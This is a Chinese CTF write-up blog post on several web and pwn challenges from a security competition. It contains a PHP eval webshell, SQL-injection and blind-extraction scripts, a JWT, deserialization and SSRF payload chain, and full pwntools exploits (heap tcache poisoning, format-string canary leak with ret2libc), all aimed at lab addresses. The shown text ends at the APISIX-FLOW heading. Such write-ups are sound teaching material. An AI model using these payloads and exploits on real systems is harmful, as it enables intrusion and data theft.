<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>第一届长城杯铁人三项赛初赛第二场 | Y0ung&#39;s Blog</title>
  <meta name="keywords" content="">
  <meta name="description" content="第一届长城杯铁人三项赛初赛第二场 | Y0ung&#39;s Blog">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta property="og:type" content="website">
<meta property="og:title" content="about">
<meta property="og:url" content="http://example.com/about/index.html">
<meta property="og:site_name" content="Y0ung&#39;s Blog">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2025-12-31T04:57:50.475Z">
<meta property="article:modified_time" content="2024-03-28T07:28:36.000Z">
<meta property="article:author" content="Y0ung_">
<meta name="twitter:card" content="summary">


<link rel="icon" href="/img/avatar.jpg">

<link href="/css/style.css?v=1.1.0" rel="stylesheet">

<link href="/css/hl_theme/atom-light.css?v=1.1.0" rel="stylesheet">

<link href="//cdn.jsdelivr.net/npm/animate.css@4.1.0/animate.min.css" rel="stylesheet">

<script src="//cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js"></script>
<script src="/js/titleTip.js?v=1.1.0" ></script>

<script src="//cdn.jsdelivr.net/npm/highlightjs@9.16.2/highlight.pack.min.js"></script>
<script>
    hljs.initHighlightingOnLoad();
</script>

<script src="//cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js"></script>



<script src="//cdn.jsdelivr.net/npm/jquery.cookie@1.4.1/jquery.cookie.min.js" ></script>

<script src="/js/iconfont.js?v=1.1.0" ></script>

<meta name="generator" content="Hexo 7.1.1"></head>
<div style="display: none">
  <input class="theme_disqus_on" value="false">
  <input class="theme_preload_comment" value="">
  <input class="theme_blog_path" value="">
  <input id="theme_shortcut" value="true" />
  <input id="theme_highlight_on" value="true" />
  <input id="theme_code_copy" value="true" />
</div>



<body>
<aside class="nav">
    <div class="nav-left">
        <a href="/"
   class="avatar_target">
    <img class="avatar"
         src="/img/avatar.jpg"/>
</a>
<div class="author">
    <span>Y0ung_</span>
</div>

<div class="icon">
    
        
    
        
            <a title="github"
               href="https://github.com/Y0ungS"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-github"></use>
                    </svg>
                
            </a>
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
            <a title="email"
               href="mailto:1798226740@qq.com"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-email"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="qq"
               href="http://wpa.qq.com/msgrd?v=3&uin=1798226740&site=qq&menu=yes"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-qq"></use>
                    </svg>
                
            </a>
        
    
        
    
        
    
</div>





<ul>
    <li>
        <div class="all active" data-rel="All">All
            
                <small>(8)</small>
            
        </div>
    </li>
    
        
            
                
    <li>
        <div data-rel="WriteUp">
            
            WriteUp
            <small>(8)</small>
        </div>
        
    </li>

            
        
    
</ul>
<div class="left-bottom">
    <div class="menus">
        
            
            
            
    </div>
    <div>
        
            <a class="about  hasFriend  site_url"
               
               href="/about">About</a>
        
        <a style="width: 50%"
                
                                           class="friends">Friends</a>
        
    </div>
</div>
<input type="hidden" id="yelog_site_posts_number" value="8">

<div style="display: none">
    <span id="busuanzi_value_site_uv"></span>
    <span id="busuanzi_value_site_pv"></span>
</div>

    </div>
    <div class="nav-right">
        <div class="friends-area">
    <div class="friends-title">
        Links
        <i class="iconfont icon-left"></i>
    </div>
    <div class="friends-content">
        <ul>
            
            <li><a target="_blank" href="https://blog.shenghuo2.top/">shenghuo2-Misc(maybe)</a></li>
            
        </ul>
    </div>
</div>
        <div class="title-list">
    <div class="right-top">
        <div id="default-panel">
            <i class="iconfont icon-search" data-title="搜索 快捷键 i"></i>
            <div class="right-title">All</div>
            <i class="iconfont icon-file-tree" data-title="切换到大纲视图 快捷键 w"></i>
        </div>
        <div id="search-panel">
            <i class="iconfont icon-left" data-title="返回"></i>
            <input id="local-search-input" autocomplete="off"/>
            <label class="border-line" for="input"></label>
            <i class="iconfont icon-case-sensitive" data-title="大小写敏感"></i>
            <i class="iconfont icon-tag" data-title="标签"></i>
        </div>
        <div id="outline-panel" style="display: none">
            <div class="right-title">大纲</div>
            <i class="iconfont icon-list" data-title="切换到文章列表"></i>
        </div>
    </div>

    <div class="tags-list">
    <input id="tag-search" />
    <div class="tag-wrapper">
        
    </div>

</div>

    
    <nav id="title-list-nav">
        
        
        <a  class="All WriteUp "
           href="/2024/06/02/DASCTF-X-HDCTF-2024-%E5%85%AC%E5%BC%80%E8%B5%9B/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="DASCTF X HDCTF 2024 公开赛">DASCTF X HDCTF 2024 公开赛</span>
            <span class="post-date" title="2024-06-02 23:54:51">2024/06/02</span>
        </a>
        
        
        <a  class="All WriteUp "
           href="/2024/06/02/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%9F%8E%E6%9D%AF%E9%93%81%E4%BA%BA%E4%B8%89%E9%A1%B9%E8%B5%9B-%E5%86%B3%E8%B5%9B/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="第一届长城杯铁人三项赛-决赛">第一届长城杯铁人三项赛-决赛</span>
            <span class="post-date" title="2024-06-02 23:46:18">2024/06/02</span>
        </a>
        
        
        <a  class="All WriteUp "
           href="/2024/06/02/%E7%AC%AC%E5%8D%81%E4%B8%83%E5%B1%8A%E5%85%A8%E5%9B%BD%E5%A4%A7%E5%AD%A6%E7%94%9F%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8%E7%AB%9E%E8%B5%9B%E2%80%94%E5%88%9B%E6%96%B0%E5%AE%9E%E8%B7%B5%E8%83%BD%E5%8A%9B%E8%B5%9B-%E5%88%9D%E8%B5%9B/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="第十七届全国大学生信息安全竞赛—创新实践能力赛-初赛">第十七届全国大学生信息安全竞赛—创新实践能力赛-初赛</span>
            <span class="post-date" title="2024-06-02 23:29:39">2024/06/02</span>
        </a>
        
        
        <a  class="All WriteUp "
           href="/2024/05/07/%E9%AB%98%E6%A0%A1%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E7%AE%A1%E7%90%86%E8%BF%90%E7%BB%B4%E8%B5%9B/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="高校网络安全管理运维赛">高校网络安全管理运维赛</span>
            <span class="post-date" title="2024-05-07 21:34:59">2024/05/07</span>
        </a>
        
        
        <a  class="All WriteUp "
           href="/2024/04/28/DozerCTF2024/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="DozerCTF2024">DozerCTF2024</span>
            <span class="post-date" title="2024-04-28 16:36:10">2024/04/28</span>
        </a>
        
        
        <a  class="All WriteUp "
           href="/2024/04/20/DASCTF-X-GFCTF-2024/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="DASCTF X GFCTF 2024">DASCTF X GFCTF 2024</span>
            <span class="post-date" title="2024-04-20 19:45:57">2024/04/20</span>
        </a>
        
        
        <a  class="All WriteUp "
           href="/2024/04/14/2024%E6%95%B0%E4%BF%A1%E6%9D%AF%E5%88%9D%E8%B5%9B-%E8%A5%BF%E5%8C%BA/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="第一届数信杯积分争夺赛初赛-西区">第一届数信杯积分争夺赛初赛-西区</span>
            <span class="post-date" title="2024-04-14 21:01:45">2024/04/14</span>
        </a>
        
        
        <a  class="All WriteUp "
           href="/2024/04/03/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%9F%8E%E6%9D%AF%E9%93%81%E4%BA%BA%E4%B8%89%E9%A1%B9%E8%B5%9B%E5%88%9D%E8%B5%9B%E7%AC%AC%E4%BA%8C%E5%9C%BA/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="第一届长城杯铁人三项赛初赛第二场">第一届长城杯铁人三项赛初赛第二场</span>
            <span class="post-date" title="2024-04-03 21:46:36">2024/04/03</span>
        </a>
        
        <div id="no-item-tips">

        </div>
    </nav>
    <div id="outline-list">
    </div>
</div>

    </div>
    <div class="hide-list">
        <div class="semicircle" data-title="切换全屏 快捷键 s">
            <div class="brackets first"><</div>
            <div class="brackets">&gt;</div>
        </div>
    </div>
</aside>
<div id="post">
    <div class="pjax">
        <article id="post-第一届长城杯铁人三项赛初赛第二场" class="article article-type-post" itemscope itemprop="blogPost">
    
        <h1 class="article-title">第一届长城杯铁人三项赛初赛第二场</h1>
    
    <div class="article-meta">
        
        
        
        <span class="book">
            <i class="iconfont icon-category"></i>
            
            
            <a  data-rel="WriteUp">WriteUp</a>
            
        </span>
        
        
    </div>
    <div class="article-meta">
        
            Created At : <time class="date" title='Updated At: 2024-04-03 21:55:58'>2024-04-03 21:46</time>
        
    </div>
    <div class="article-meta">
        
        
        <span id="busuanzi_container_page_pv">
            Views 👀 :<span id="busuanzi_value_page_pv">
                <span class="count-comment">
                    <span class="spinner">
                      <div class="cube1"></div>
                      <div class="cube2"></div>
                    </span>
                </span>
            </span>
        </span>
        
        
    </div>
    
    <div class="toc-ref">
    
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Black-web"><span class="toc-text">Black web</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%BF%85%E8%80%83"><span class="toc-text">必考</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Easy-login"><span class="toc-text">Easy_login</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#easy-note"><span class="toc-text">easy_note</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#New-Old-man"><span class="toc-text">New_Old_man</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#cardstore"><span class="toc-text">cardstore</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#APISIX-FLOW"><span class="toc-text">APISIX-FLOW</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%8C%B6"><span class="toc-text">茶</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#babyrsa2"><span class="toc-text">babyrsa2</span></a></li></ol>
    
<style>
    .left-col .switch-btn,
    .left-col .switch-area {
        display: none;
    }
    .toc-level-3 i,
    .toc-level-3 ol {
        display: none !important;
    }
</style>
</div>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h2 id="Black-web"><a href="#Black-web" class="headerlink" title="Black web"></a>Black web</h2><blockquote>
<p>黑盒。</p>
</blockquote>
<p>直接在<code>/index.php?page=submit</code>处上传Webshell一句话木马shell.php。</p>
<p><img src="https://raw.githubusercontent.com/Y0ungS/imgbed/main/images/2024-03-30-17-52-28.png"><br>然后修改MIME为<code>image/gif</code>：</p>
<p><img src="https://raw.githubusercontent.com/Y0ungS/imgbed/main/images/2024-03-30-17-52-48.png"></p>
<p>即可绕过过滤直接上传成功：</p>
<p><img src="https://raw.githubusercontent.com/Y0ungS/imgbed/main/images/2024-03-30-17-52-56.png"></p>
<p>访问<code>/uploads/1711788642.php</code>发现成功访问到上传的后门：</p>
<p><img src="https://raw.githubusercontent.com/Y0ungS/imgbed/main/images/2024-03-30-17-53-01.png"><br>但是文件内容中PHP标签的问号<code>?</code>被过滤，使用长标签绕过：</p>
<pre><code class="php">&lt;script language=&quot;php&quot;&gt;@eval($_REQUEST[&#39;cmd&#39;]);&lt;/script&gt;
</code></pre>
<p>将文件内容修改为上面这个长标签一句话木马后重复上述操作即可访问拿到Webshell，<code>?cmd=system(&quot;ls ..&quot;);</code>后发现<code>u_c4nt_f1nd_flag.php</code>：</p>
<p><img src="https://raw.githubusercontent.com/Y0ungS/imgbed/main/images/2024-03-30-17-53-10.png"></p>
<p><code>?cmd=system(&quot;cat ../u_c4nt_f1nd_flag.php&quot;);</code>即得flag：flag{c322d5e45e93f004bbab9a03ec6ac720}。</p>
<p><img src="https://raw.githubusercontent.com/Y0ungS/imgbed/main/images/2024-03-30-17-53-18.png"></p>
<h2 id="必考"><a href="#必考" class="headerlink" title="必考"></a>必考</h2><blockquote>
<p>SQL注入是比较常见的网络攻击方式之一。	</p>
</blockquote>
<p>查看源码得到hint：</p>
<pre><code class="html">&lt;!DOCTYPE html&gt;
&lt;html lang=&quot;en&quot; class=&quot;no-js&quot;&gt;

    &lt;head&gt;

        &lt;meta charset=&quot;utf-8&quot;&gt;
        &lt;title&gt;Fullscreen Login&lt;/title&gt;
        &lt;meta name=&quot;viewport&quot; content=&quot;width=device-width, initial-scale=1.0&quot;&gt;
        &lt;meta name=&quot;description&quot; content=&quot;&quot;&gt;
        &lt;meta name=&quot;author&quot; content=&quot;&quot;&gt;

        &lt;!-- CSS --&gt;
        &lt;link rel=&#39;stylesheet&#39; href=&#39;http://fonts.googleapis.com/css?family=PT+Sans:400,700&#39;&gt;
        &lt;link rel=&quot;stylesheet&quot; href=&quot;assets/css/reset.css&quot;&gt;
        &lt;link rel=&quot;stylesheet&quot; href=&quot;assets/css/supersized.css&quot;&gt;
        &lt;link rel=&quot;stylesheet&quot; href=&quot;assets/css/style.css&quot;&gt;

        &lt;!-- HTML5 shim, for IE6-8 support of HTML5 elements --&gt;
        &lt;!--[if lt IE 9]&gt;
            &lt;script src=&quot;http://html5shim.googlecode.com/svn/trunk/html5.js&quot;&gt;&lt;/script&gt;
        &lt;![endif]--&gt;

    &lt;/head&gt;

    &lt;body&gt;

        &lt;div class=&quot;page-container&quot;&gt;
            &lt;h1&gt;Login&lt;/h1&gt;
            &lt;form action=&quot;&quot; method=&quot;post&quot;&gt;
                &lt;input type=&quot;text&quot; name=&quot;uname&quot; class=&quot;username&quot; placeholder=&quot;Username&quot;&gt;
                &lt;input type=&quot;password&quot; name=&quot;pwd&quot; class=&quot;password&quot; placeholder=&quot;Password&quot;&gt;
                &lt;button type=&quot;submit&quot;&gt;Sign me in&lt;/button&gt;
                &lt;div class=&quot;error&quot;&gt;&lt;span&gt;+&lt;/span&gt;&lt;/div&gt;
            &lt;/form&gt;
            &lt;div class=&quot;connect&quot;&gt;
                &lt;p&gt;Or connect with:&lt;/p&gt;
                &lt;p&gt;
                    &lt;a class=&quot;facebook&quot; href=&quot;&quot;&gt;&lt;/a&gt;
                    &lt;a class=&quot;twitter&quot; href=&quot;&quot;&gt;&lt;/a&gt;
                &lt;/p&gt;
            &lt;/div&gt;
        &lt;/div&gt;

        &lt;!-- Javascript --&gt;
        &lt;script src=&quot;assets/js/jquery-1.8.2.min.js&quot;&gt;&lt;/script&gt;
        &lt;script src=&quot;assets/js/supersized.3.2.7.min.js&quot;&gt;&lt;/script&gt;
        &lt;script src=&quot;assets/js/supersized-init.js&quot;&gt;&lt;/script&gt;
        &lt;script src=&quot;assets/js/scripts.js&quot;&gt;&lt;/script&gt;

    &lt;/body&gt;

&lt;/html&gt;

&lt;!--hint:数据库中密码字段名为pwd，且只有一个用户名为admin的用户--&gt;&lt;br/&gt;
</code></pre>
<p>数据库中密码字段名为pwd，且只有一个用户名为admin的用户。尝试使用万能密码等方式绕过登录admin用户发现未果且存在对部分关键字的过滤提示<code>naive</code>，包括空格、<code>union</code>、<code>select</code>等，并且大致意识到登录时后台执行查询的SQL语句不涉及对密码<code>pwd</code>字段的查询。结合无法联合注入查询任何字段数据的条件，大概可以猜测出后台执行的SQL查询语句逻辑大致为：</p>
<pre><code class="sql">select pwd from user where uname=&#39;&#39;;
</code></pre>
<p>通过我们登录的用户名查询出密码再与我们登录输入的密码比较是否一致，一致则成功登录否则提示<code>password error!</code>，若查询不到用户名对应的密码则提示<code>no such user</code>。那我们可以通过SQL注入把以用户名为条件的查询改为以密码为条件的查询从而根据提示的不同逐位爆破盲注出密码，只需要传参：</p>
<pre><code>uname=admin0&#39;||(pwd)regexp(&#39;^f&#39;)#&amp;pwd=123
</code></pre>
<p>使SQL语句被注入变为：</p>
<pre><code class="sql">select pwd from user where uname=&#39;admin0&#39;||(pwd)regexp(&#39;^f&#39;);
</code></pre>
<p>让后台执行查询绝对不存在的用户<code>admin0</code>，这样前面的用户名条件就形同虚设一定查询不到任何对应的数据，再根据后面注入的密码<code>pwd</code>条件判断是否能对应查询出唯一admin用户的密码即可通过这里的<code>regexp</code>正则逐位匹配判断盲注出密码，第一位简单尝试后发现是<code>f</code>（只有<code>^f</code>提示<code>password error!</code>其余均提示用户不存在），那么直接搓脚本：</p>
<pre><code class="python">import requests 
URL=&quot;http://192.168.17.229:8001/&quot; 
flag=&#39;f&#39; 

#fsaoaigafsdfsdubbwouibiaewrawe
#flag&#123;c2ed8446cdd599bc7d0cbcb4923797d7&#125;

while True: 
    for i in &quot;abcdefghijklmnopqrstuvwxyz0123456789&quot;: 
        data=&#123;&quot;uname&quot;:f&quot;123&#39;||(pwd)regexp(&#39;^&#123;flag+i&#125;&#39;)#&quot;,&quot;pwd&quot;:&quot;123&quot;&#125; 
        R=requests.post(URL,data=data) 
        R.encoding=&quot;utf-8&quot; 
        if &quot;password error!&quot; in R.text: 
            flag+=i 
            print(flag) 
            break
</code></pre>
<p>即可跑出密码<code>fsaoaigafsdfsdubbwouibiaewrawe</code>，登录admin用户即得flag：flag{c2ed8446cdd599bc7d0cbcb4923797d7}。</p>
<h2 id="Easy-login"><a href="#Easy-login" class="headerlink" title="Easy_login"></a>Easy_login</h2><blockquote>
<p>由于开发人员安全意识…</p>
</blockquote>
<p>很套的一道题，JWT伪造+SQL注入+反序列化+SSRF。</p>
<p>先用从源代码注释里面拿到的用户名密码<code>test/123456</code>登录，在Cookie中拿到JWT：</p>
<p><img src="https://raw.githubusercontent.com/Y0ungS/imgbed/main/images/2024-03-30-17-54-07.png"></p>
<p>JWT爆破密钥得到<code>88888888</code>，伪造<code>id</code>为<code>1</code>，<code>username</code>为<code>admin</code>可以得到两个<code>test</code>测试用户与两个测试页面<code>test_page</code>。但是若<code>username</code>不为<code>admin</code>就无法得到，提示<code>No have!!!</code>。</p>
<p>很蹊跷诡异，有点SQL注入的感觉，尝试：</p>
<pre><code>admin&#39;
admin#
admin&#39;#
admin&#39; order by 1#
admin&#39; order by 2#
admin&#39; union select 1#
</code></pre>
<p>等<code>username</code>后发现的确存在SQL注入，查询列数为1，并且<code>union select</code>联合查询得到的数据会提示<code>Can&#39;t unserialize</code>（如<code>admin&#39; union select 1#</code>得到<code>Can&#39;t unserialize:1</code>）。</p>
<p>那就先脱裤跑出来数据库里的数据呗，依次构造<code>username</code>拿去伪造JWT：</p>
<pre><code>admin&#39; union select database()#
admin&#39; union select group_concat(table_name) from information_schema.columns where table_schema=database()#
admin&#39; union select group_concat(column_name) from information_schema.columns where table_schema=database()#
admin&#39; union select group_concat(id) from user#
admin&#39; union select group_concat(username) from user#
admin&#39; union select group_concat(password) from user#
admin&#39; union select group_concat(manager) from user#
admin&#39; union select group_concat(serialize) from user#
</code></pre>
<p>得到数据库名为<code>ctf_jwt</code>，其中只有一个<code>user</code>表，表中有5列<code>id</code>、<code>username</code>、<code>password</code>、<code>manager</code>、<code>serialize</code>，数据依次为：</p>
<pre><code>1, 2, 3
admin, test, test2
c0041c99d2864b63949b818b29b6d52a, 123456, 12345678
admin,admin
一堆序列化USER类数据
</code></pre>
<p>其中最后查询<code>serialize</code>列字段内容时，发现查询到的数据并没有以<code>Can&#39;t unserialize</code>的形式回显出来而是正常反序列化了，最后看起来就像重复了两次出现测试用户和测试页面，这让我意识到此处还存在反序列化并且有对应数据，于是使用：</p>
<pre><code>admin&#39; union select hex(group_concat(serialize)) from user#
</code></pre>
<p>拿到<code>serialize</code>列字段中的USER类序列化数据，发现其中只有两个<code>localhost</code>的测试页面URL网址而没有对应的页面内容，此时我意识到它是通过反序列化得到URL后进行SSRF访问得到对应的页面内容数据才最终回显出来，那我们这里直接自行对应构造payload：</p>
<pre><code>O:4:&quot;USER&quot;:3:&#123;s:8:&quot;%00USER%00id&quot;;i:2;s:14:&quot;%00USER%00username&quot;;s:4:&quot;test&quot;;s:9:&quot;%00USER%00url&quot;;s:12:&quot;file:///flag&quot;;&#125;
</code></pre>
<p>使用<code>file://</code>伪协议尝试直接SSRF读取<code>/flag</code>，将payload进行16进制编码代入到SQL注入语句中放入<code>username</code>伪造JWT：</p>
<pre><code>admin&#39; union select 0x4f3a343a2255534552223a333a7b733a383a220055534552006964223b693a323b733a31343a22005553455200757365726e616d65223b733a343a2274657374223b733a393a2200555345520075726c223b733a31323a2266696c653a2f2f2f666c6167223b7d#
</code></pre>
<p>得到：</p>
<pre><code>eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjEiLCJ1c2VybmFtZSI6ImFkbWluJyB1bmlvbiBzZWxlY3QgMHg0ZjNhMzQzYTIyNTU1MzQ1NTIyMjNhMzMzYTdiNzMzYTM4M2EyMjAwNTU1MzQ1NTIwMDY5NjQyMjNiNjkzYTMyM2I3MzNhMzEzNDNhMjIwMDU1NTM0NTUyMDA3NTczNjU3MjZlNjE2ZDY1MjIzYjczM2EzNDNhMjI3NDY1NzM3NDIyM2I3MzNhMzkzYTIyMDA1NTUzNDU1MjAwNzU3MjZjMjIzYjczM2EzMTMyM2EyMjY2Njk2YzY1M2EyZjJmMmY2NjZjNjE2NzIyM2I3ZCMifQ.Pnb_6yuFmC4x5H9jR0D2t1lPsnICE1MS2iKtRJAyllY
</code></pre>
<p>最后直接带着这个JWT访问打即可发现在刚才两个测试页面下面多了一行<code>file:///flag</code>页面，页面内容即为flag。</p>
<h2 id="easy-note"><a href="#easy-note" class="headerlink" title="easy_note"></a>easy_note</h2><blockquote>
<p>简单的记事本。</p>
</blockquote>
<p>GET传参<code>?code</code>拿到源码：<br><img src="https://raw.githubusercontent.com/Y0ungS/imgbed/main/images/2024-03-30-17-54-17.png"><br>审计后发现我们可以直接上传一个<code>shell.txt</code>文件，内容为：</p>
<pre><code class="php">&lt;?=`cat /flag`?&gt;
</code></pre>
<p>这样，首先符合<code>strrchr</code>函数检测要求后缀名必须为<code>.txt</code>的条件；继续，由于<code>&lt;?</code>的php标签位于文件内容的开头即索引为0，故<code>stripos</code>函数检测<code>&lt;?</code>时实际上的返回值为0，条件是成立的；最后，不能使用<code>&lt;?php</code>标签和长标签因为含有<code>php</code>字段且索引不为0，故此处直接使用<code>&lt;?=</code>标签结合反引号相当于直接<code>echo</code>执行系统命令RCE即可。上述条件全部符合绕过后即可<code>include</code>包含执行我们构造上传的恶意代码，直接<code>cat /flag</code>即得flag。</p>
<h2 id="New-Old-man"><a href="#New-Old-man" class="headerlink" title="New_Old_man"></a>New_Old_man</h2><blockquote>
<p>Try to getshell. 此题目端口为7777， IP地址同其它WEB题， 如 192.168.<em>.</em>:7777	</p>
</blockquote>
<p>堆题目，看数据结构:</p>
<p><img src="https://raw.githubusercontent.com/Y0ungS/imgbed/main/images/2024-03-30-17-11-27.png"><br>没有额外的数据结构，仅仅是基本的堆。最多申请六个堆且没有限制大小<br>其他函数没有特殊的地方，edit没有溢出属性<br><img src="https://raw.githubusercontent.com/Y0ungS/imgbed/main/images/2024-03-30-17-11-32.png"><br>最后看delete，可见有一个UAF漏洞</p>
<p>通过unsorted bin leak 泄露出libc_base，然后通过tcachebin poisoning修改free_hook为gift后门，最后free一下即可获得shell</p>
<pre><code class="python">from pwn import *
from struct import pack
from ctypes import *

binary = &#39;./pwn1&#39;
elf_libc = &#39;libc-2.27.so&#39;

context.os = &#39;linux&#39;
context.arch = &#39;amd64&#39;
context.log_level = &#39;debug&#39;

# p = process(binary)
p = remote(&#39;192.168.17.229&#39;, 7777)


def debug():
    gdb.attach(p)
    pause()


def brk(addr):
    b_addr = str(addr)
    addr = &#39;b *&#39; + b_addr
    # addr = &#39;b *$rebase(&#123;&#125;)&#39;.format(b_addr)
    gdb.attach(p, addr)


def get_addr():
    return u64(p.recvuntil(b&#39;\x7f&#39;)[-6:].ljust(8, b&#39;\x00&#39;))


def get_sb():
    return libc_base + libc.sym[&#39;system&#39;], libc_base + next(libc.search(b&#39;/bin/sh\x00&#39;))


se = lambda data: p.send(data)
sa = lambda delim, data: p.sendafter(delim, data)
sl = lambda data: p.sendline(data)
sla = lambda delim, data: p.sendlineafter(delim, data)
sea = lambda delim, data: p.sendafter(delim, data)
rc = lambda numb=4096: p.recv(numb)
rl = lambda: p.recvline()
ru = lambda delims: p.recvuntil(delims)
su = lambda delim, data: success(delim + hex(data))

elf = ELF(binary)
libc = ELF(elf_libc)

menu = &quot;needed&quot;
gift = 0x4007f7

def add(index, size, content):
    sla(menu, b&#39;1&#39;)
    sla(&quot;add?\n&quot;, str(index))
    sla(&quot;include?:\n&quot;, str(size))
    sea(&quot;about:\n&quot;, content)


def show(index):
    sla(menu, b&#39;2&#39;)
    sla(&quot;show?\n&quot;, str(index))


def edit(index, content):
    sla(menu, b&#39;3&#39;)
    sla(&quot;edit?\n&quot;, str(index))
    sea(&quot;about:\n&quot;, content)


def free(index):
    sla(menu, b&#39;4&#39;)
    sla(&quot;delete?\n&quot;, str(index))


add(0, 0x410, b&#39;aaaaaaaa&#39;)
add(1, 0x20, b&#39;bbbb&#39;)
add(2, 0x20, b&#39;cccc&#39;)
free(0)
free(1)
show(0)

libc_base = get_addr() - libc.sym[&#39;__malloc_hook&#39;] - 0x70
su(&quot;libc_base:&quot;, libc_base)
# brk(0x4008cd)
# pause()
free_hook = libc_base + libc.sym[&#39;__free_hook&#39;]
edit(1, p64(free_hook))
add(3, 0x20, b&#39;aaaa&#39;)
add(4, 0x20, p64(gift))
su(&quot;free_hook:&quot;, free_hook)
free(4)
#debug()

p.interactive()
</code></pre>
<p><img src="https://raw.githubusercontent.com/Y0ungS/imgbed/main/images/2024-03-30-17-09-31.png"><br><img src="https://raw.githubusercontent.com/Y0ungS/imgbed/main/images/2024-03-30-17-11-10.png"></p>
<h2 id="cardstore"><a href="#cardstore" class="headerlink" title="cardstore"></a>cardstore</h2><blockquote>
<p>使用nc 访问题目ip和端口。此题目端口为9999， IP地址同其它WEB题， 如 192.168.<em>.</em>:9999</p>
</blockquote>
<p>​	</p>
<p><img src="https://raw.githubusercontent.com/Y0ungS/imgbed/main/images/2024-03-30-17-08-27.png"><br><img src="https://raw.githubusercontent.com/Y0ungS/imgbed/main/images/2024-03-30-17-08-38.png"><br>addstore有格式化字符串漏洞。存在一个整数溢出，可以进行栈溢出<br>格式化字符串泄露canary,栈溢出打ret2libc</p>
<pre><code class="python">from pwn import *
from struct import pack
from ctypes import *

binary = &#39;./cardstore&#39;
# elf_libc = &#39;/lib/x86_64-linux-gnu/libc.so.6&#39;
elf_libc = &#39;libc-2.23.so&#39;

context.os = &#39;linux&#39;
context.arch = &#39;amd64&#39;
context.log_level = &#39;debug&#39;

# p = process(binary)
p = remote(&#39;192.168.17.229&#39;, 9999)


def debug():
    gdb.attach(p)
    pause()


def brk(addr):
    b_addr = str(addr)
    addr = &#39;b *&#39; + b_addr
    # addr = &#39;b *$rebase(&#123;&#125;)&#39;.format(b_addr)
    gdb.attach(p, addr)


def get_addr():
    return u64(p.recvuntil(b&#39;\x7f&#39;)[-6:].ljust(8, b&#39;\x00&#39;))


def get_sb():
    return libc_base + libc.sym[&#39;system&#39;], libc_base + next(libc.search(b&#39;/bin/sh\x00&#39;))


se = lambda data: p.send(data)
sa = lambda delim, data: p.sendafter(delim, data)
sl = lambda data: p.sendline(data)
sla = lambda delim, data: p.sendlineafter(delim, data)
sea = lambda delim, data: p.sendafter(delim, data)
rc = lambda numb=4096: p.recv(numb)
rl = lambda: p.recvline()
ru = lambda delims: p.recvuntil(delims)
su = lambda delim, data: success(delim + hex(data))

elf = ELF(binary)
libc = ELF(elf_libc)

# 0x0000000000400b6c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000400b6e : pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000400b70 : pop r14 ; pop r15 ; ret
# 0x0000000000400b72 : pop r15 ; ret
# 0x0000000000400b6b : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000400b6f : pop rbp ; pop r14 ; pop r15 ; ret
# 0x0000000000400740 : pop rbp ; ret
# 0x0000000000400b73 : pop rdi ; ret
# 0x0000000000400b71 : pop rsi ; pop r15 ; ret
# 0x0000000000400b6d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000400295 : ret
# 0x0000000000400662 : ret 0x2019
pop_rdi = 0x400b73
pop_rsi_r15 = 0x400b71
ret = 0x400295
main = 0x400907
puts_plt = elf.plt[&#39;puts&#39;]
puts_got = elf.got[&#39;puts&#39;]

sla(&quot;choice &gt;&gt;\n&quot;, b&#39;1&#39;)
sla(&quot;name:\n&quot;, b&#39;%7$p&#39;)
canary = int(p.recv(18), 16)
su(&quot;canary:&quot;, canary)

sla(&quot;choice &gt;&gt;\n&quot;, b&#39;3&#39;)
sla(&quot;delete?\n&quot;, b&#39;-1000&#39;)

payload = cyclic(0x108) + p64(canary) + p64(0xdeadbeef) + flat([pop_rdi, puts_got, puts_plt, main])
sla(&quot;game?\n&quot;, payload)

libc_base = get_addr() - libc.sym[&#39;puts&#39;]
system, bin_sh = get_sb()
su(&quot;system:&quot;, system)

# brk(0x4009da)
# pause()
sla(&quot;delete?\n&quot;, b&#39;-100&#39;)

payload = cyclic(0x108) + p64(canary) + p64(0) + flat([ret, pop_rdi, bin_sh, system])
sea(&quot;game?\n&quot;, payload)

p.interactive()
</code></pre>
<p><img src="https://raw.githubusercontent.com/Y0ungS/imgbed/main/images/2024-03-30-17-08-56.png"></p>
<h2 id="APISIX-FLOW"><a href="#APISIX-FLOW" class="headerlink" title="APISIX-FLOW"></a>APISIX-FLOW</h2><blockquote>
<p>可恶，我的Apache服务</p>
</blockquote>
